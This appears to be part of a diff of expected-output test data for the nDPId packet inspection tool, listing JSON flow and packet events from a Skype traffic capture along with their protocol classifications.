+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1431969791166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969791166,"pkt":"0NQSxnP1PBXCt3IOCABFAABA8JJAAEAGte\/AqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/hugAAAgQFtAEDAwUBAQgKPiTNeQAAAAAEAgAA"} +00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1431969792168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792168,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6r1AAEAGu8TAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/d0gAAAgQFtAEDAwUBAQgKPiTRYQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969792778,"flow_last_seen":1431969792778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969792778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1431969792778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792778,"pkt":"0NQSxnP1PBXCt3IOCABFAABACyhAAEAGm1rAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/F2QAAAgQFtAEDAwUBAQgKPiTTwgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3228,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1431969793170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793170,"pkt":"0NQSxnP1PBXCt3IOCABFAABATYlAAEAGWPnAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/Z6gAAAgQFtAEDAwUBAQgKPiTVSQAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1431969793871,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969793871,"pkt":"0NQSxnP1PBXCt3IOCABFAAA68cwAAEARBXPAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3236,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1431969794907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969794907,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ITcAAEAR1gjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3239,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1431969796001,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969796001,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6focAAEAReLjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3269,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808100,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","ndpi": 